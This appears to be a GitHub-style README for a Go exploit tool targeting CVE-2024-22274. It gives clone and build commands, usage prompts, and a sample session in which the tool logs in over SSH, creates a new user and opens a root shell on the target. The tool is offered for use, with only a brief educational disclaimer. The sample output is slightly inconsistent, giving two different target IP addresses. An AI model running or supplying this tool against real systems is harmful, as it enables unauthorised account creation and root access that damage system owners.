## https://sploitus.com/exploit?id=B9F020B5-43C7-5BA2-AC01-0E1C1867BA00
# CVE-2024-22274 Exploit
This repository contains an exploit for CVE-2024-22274. The exploit creates a new user on a remote machine via SSH and then provides a root shell.
## Requirements
- Go (Golang) installed on your machine. You can download it from [here](https://golang.org/dl/).
- A remote machine with SSH access.
## Compilation
1. Clone the repository:
```sh
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
```
2. Install the required packages:
```sh
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
```
3. Compile the Go program:
```sh
go build -o cve-2024-22274-rce main.go
```
## Usage
1. Run the compiled program:
```sh
./cve-2024-22274-rce
```
2. Follow the prompts:
- Enter the host address of the target machine.
- Enter the SSH port (default is 22).
- Enter the SSH username of the target machine.
- Enter the SSH password of the target machine.
- Enter the new username you want to create.
- Enter the new password for the new user.
3. After the user is created, you will get a root shell on the target machine. You can execute commands as the new user.
## Example
```sh
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
```
Disclaimer
This code is for educational purposes only. Use it responsibly and only on systems you have permission to test.
License
This project is licensed under the MIT License - see the LICENSE file for details.